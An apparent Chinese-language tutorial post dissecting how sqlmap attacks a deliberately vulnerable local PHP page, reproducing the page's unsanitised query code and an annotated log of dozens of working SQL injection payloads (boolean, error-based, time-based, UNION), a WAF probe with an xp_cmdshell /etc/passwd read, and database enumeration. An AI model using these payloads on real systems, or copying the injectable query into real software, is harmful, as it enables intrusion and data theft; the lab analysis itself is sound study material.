sqlmap注入过程浅析
sqlmap是python脚本写的自动化sql注入工具,把常用的注入步骤以程序实现,节省了人力成本下面就以实例来说明:
服务器端php文件:
<html>
<head>
<title>登录验证</title>
<meta http-equiv="content-type"content="text/html;charset=utf-8">
</head>
<body>
<?php
$conn=@mysql_connect("localhost",'root','li')or die("数据库连接失败!");;
mysql_select_db("dvwa",$conn) or die("您要选择的数据库不存在");
echo "connect ok";
$id=$_GET['id'];
$sql="select * from users where user_id='$id'";
$result=mysql_query($sql);
$row=mysql_fetch_row($result);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
// 显示字段名称
echo "</b><tr></b>";
for ($i=0; $i<mysql_num_fields($result); $i++)
{
echo '<td bgcolor="#FF0F00"><b>'.
mysql_field_name($result, $i);
echo "</b></td></b>";
}
echo "</tr></b>";
// 定位到第一条记录
mysql_data_seek($result, 0);
// 循环取出记录
while ($row=mysql_fetch_row($result))
{
echo "<tr></b>";
for ($i=0; $i<mysql_num_fields($result); $i++ )
{
echo '<td bgcolor="#00FF00">';
echo $row[$i];
echo '</td>';
}
echo "</tr></b>";
}
mysql_free_result($result);
mysql_close($conn);
?>
</body>
</html>
使用sqlmap
python sqlmap.py -v3 -u http://127.0.0.1/test/validate.php?id=1 --dbs --tables得到日志解析如下:
初始化(解析域名、确定编码)
cleaning up configuration parameters
setting the HTTP timeout
creating HTTP requests opener object
resolving hostname '127.0.0.1'
testing connection to the target URL
declared web page charset 'utf-8'
环境检测 防护系统
checking if the target is protected by some kind of WAF/IPS/IDS
ahzV=9142 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
确定可注入性及注入类型(布尔类型盲注)
testing if the target URL is stable
target URL is stable
testing if GET parameter 'id' is dynamic
8267
confirming that GET parameter 'id' is dynamic
5749
GET parameter 'id' does not appear dynamic
1"..)".",''
heuristic (basic) test shows that GET parameter 'id' might not be injectable
1'YuAvwN<'">HeGQes
testing for SQL injection on GET parameter 'id'
testing 'AND boolean-based blind - WHERE or HAVING clause'
1) AND 8987=4935 AND (3536=3536
1) AND 3701=3701 AND (4550=4550
1 AND 9686=8234
1 AND 3701=3701
1 AND 8253=7350-- EnRF
1 AND 3701=3701-- FLRJ
1') AND 7509=1564 AND ('Jebu'='Jebu
1') AND 3701=3701 AND ('geaK'='geaK
1' AND 8063=2482 AND 'XbEF'='XbEF
1' AND 3701=3701 AND 'RMkX'='RMkX
1' AND 5856=1503 AND 'RDlY'='RDlY
GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
根据特征确定目标系统SQL类型及版本(MySQL >= 5.0.12 匹配率0.6)
1' AND (SELECT CHR(114)&CHR(100)&CHR(107)&CHR(97) FROM MSysAccessObjects)=CHR(114)&CHR(100)&CHR(107)&CHR(97) AND 'DbiY'='DbiY
1' AND (SELECT CHR(74)||CHR(118)||CHR(111)||CHR(107) FROM SYSIBM.SYSDUMMY1)=CHR(74)||CHR(118)||CHR(111)||CHR(107) AND 'cSsG'='cSsG
1' AND (SELECT 'mfPA' FROM RDB$DATABASE)='mfPA' AND 'aTlO'='aTlO
1' AND (SELECT CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) FROM INFORMATION_SCHEMA.SYSTEM_USERS)=CHAR(102)||CHAR(84)||CHAR(76)||CHAR(90) AND 'Jlkw'='Jlkw
1' AND (SELECT 'kWiI' FROM VERSIONS)='kWiI' AND 'ZErM'='ZErM
1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66) AND 'TwOu'='TwOu
1' AND (SELECT CHAR(73)+CHAR(103)+CHAR(110)+CHAR(66))=CHAR(110)+CHAR(90)+CHAR(82)+CHAR(106) AND 'uRvF'='uRvF
1' AND (SELECT 0x70676341)=0x70676341 AND 'Rzan'='Rzan
1' AND (SELECT 0x70676341)=0x70707a4a AND 'kWRF'='kWRF
heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(5899=5899,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'RXbN'='RXbN
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(4950=4950,1))),0x71766a7671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'OBtX'='OBtX
testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(7284=7284,1))),0x71766a7671,0x78))x)) AND 'XMFW'='XMFW
testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (EXP)'
1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x71766a7071,(SELECT (ELT(6492=6492,1))),0x71766a7671,0x78))x)) AND 'XnKl'='XnKl
testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(1401=1401,1))),0x71766a7671)) USING utf8))) AND 'rPMT'='rPMT
testing 'MySQL >= 5.7.8 OR error-based - WHERE, HAVING clause (JSON_KEYS)'
1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x71766a7071,(SELECT (ELT(6928=6928,1))),0x71766a7671)) USING utf8))) AND 'dDAJ'='dDAJ
testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
1' AND (SELECT 2362 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2362=2362,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WpJo'='WpJo
testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
1' OR (SELECT 2642 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(2642=2642,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DGTi'='DGTi
testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
1' AND EXTRACTVALUE(2314,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(2314=2314,1))),0x71766a7671)) AND 'MlLO'='MlLO
testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
1' OR EXTRACTVALUE(3279,CONCAT(0x5c,0x71766a7071,(SELECT (ELT(3279=3279,1))),0x71766a7671)) AND 'rGGW'='rGGW
testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
1' AND UPDATEXML(3523,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3523=3523,1))),0x71766a7671),5575) AND 'hWrX'='hWrX
testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
1' OR UPDATEXML(3425,CONCAT(0x2e,0x71766a7071,(SELECT (ELT(3425=3425,1))),0x71766a7671),7820) AND 'WRvI'='WRvI
testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
1' AND ROW(5681,3126)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(5681=5681,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 8419 UNION SELECT 2289 UNION SELECT 6743 UNION SELECT 1845)a GROUP BY x) AND 'ARNc'='ARNc
testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause (FLOOR)'
1' OR ROW(8270,8355)>(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8270=8270,1))),0x71766a7671,FLOOR(RAND(0)*2))x FROM (SELECT 9652 UNION SELECT 4070 UNION SELECT 3526 UNION SELECT 2818)a GROUP BY x) AND 'DOpg'='DOpg
testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
-2827
-2163' OR 1 GROUP BY CONCAT(0x71766a7071,(SELECT (CASE WHEN (3728=3728) THEN 1 ELSE 0 END)),0x71766a7671,FLOOR(RAND(0)*2)) HAVING MIN(0)#
testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
1' PROCEDURE ANALYSE(EXTRACTVALUE(9234,CONCAT(0x5c,0x71766a7071,(SELECT (CASE WHEN (9234=9234) THEN 1 ELSE 0 END)),0x71766a7671)),1) AND 'tDdN'='tDdN
testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
testing 'MySQL inline queries'
(SELECT CONCAT(0x71766a7071,(SELECT (ELT(7909=7909,1))),0x71766a7671))
testing 'MySQL > 5.0.11 stacked queries (comment)'
1';SELECT SLEEP(5)#
testing 'MySQL > 5.0.11 stacked queries'
1';SELECT SLEEP(5) AND 'psZF'='psZF
testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
1';SELECT BENCHMARK(5000000,MD5(0x6477584b))#
testing 'MySQL < 5.0.12 stacked queries (heavy query)'
1';SELECT BENCHMARK(5000000,MD5(0x446a4f65)) AND 'AIFn'='AIFn
testing 'MySQL >= 5.0.12 AND time-based blind'
1' AND SLEEP(5) AND 'Ngyy'='Ngyy
1' AND SLEEP(5) AND 'Ngyy'='Ngyy
GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
testing 'Generic UNION query (NULL) - 1 to 20 columns'
automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
1' ORDER BY 1-- zxuS
1' ORDER BY 3603-- ZDKi
setting match ratio for current parameter to 0.600
确定表列数 (2分order by)
'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
1' ORDER BY 10-- hKIf
1' ORDER BY 6-- MBub
1' ORDER BY 8-- mdEk
1' ORDER BY 9-- EQQE
target URL appears to have 8 columns in query
测试id union查询
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x456e4b6372506562775171447847415a667866754d4878504c55524a645257624667685377784748,0x71766a7671),NULL,NULL,NULL,NULL-- kwXd
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL FROM (SELECT 0 AS KdfH UNION SELECT 1 UNION SELECT 2 UNION SELECT 3 UNION SELECT 4 UNION SELECT 5 UNION SELECT 6 UNION SELECT 7 UNION SELECT 8 UNION SELECT 9 UNION SELECT 10 UNION SELECT 11 UNION SELECT 12 UNION SELECT 13 UNION SELECT 14) AS lWUm-- HUty
GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
判断参数长度限制
checking for parameter length constrainting mechanisms
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,(CASE WHEN (3602= 3602) THEN 1 ELSE 0 END),0x71766a7671),NULL,NULL,NULL,NULL-- jEVX
performed 1 queries in 1.45 seconds
checking for filtered characters
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? sqlmap identified the following injection point(s) with a total of 54 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 3701=3701 AND 'RMkX'='RMkX
Vector: AND
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'Ngyy'='Ngyy
Vector: AND =IF((),SLEEP(),)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,0x786e6c704d416d5544724b4f4a4178724e775252686f744344576f706f5a4f57485541567377586e,0x71766a7671),NULL,NULL,NULL,NULL-- iqYL
Vector:UNION ALL SELECT NULL,NULL,NULL,,NULL,NULL,NULL,NULL
---
the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.29, Apache 2.4.18
back-end DBMS: MySQL >= 5.0.12
fetching database names
获取表名(information_schema.schemata元数据查表)
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(schema_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA—qmix
qvjpqinformation_schemaqvjvq
qvjpqchallengesqvjvq
qvjpqdvwaqvjvq
qvjpqmysqlqvjvq
qvjpqperformance_schemaqvjvq
qvjpqsecurityqvjvq
qvjpqtestqvjvq
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request(s)
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
unable to connect to the target URL ('
') or proxy. sqlmap is going to retry the request
performed 1 queries in 1.12 seconds
available databases :
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
获取列名(information_schema.tables元数据查列)
qvjpqdvwavmbhdeguestbookqvjvq
qvjpqdvwavmbhdeusersqvjvq
fetching tables for databases: 'challenges, dvwa, information_schema, mysql, performance_schema, security, test'
1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7071,IFNULL(CAST(table_schema AS CHAR),0x20),0x766d62686465,IFNULL(CAST(table_name AS CHAR),0x20),0x71766a7671),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6368616c6c656e676573,0x64767761,0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c,0x706572666f726d616e63655f736368656d61,0x7365637572697479,0x74657374)-- eEZq
performed 1 queries in 1.11 seconds
Database: performance_schema
Database: dvwa
页:
[1]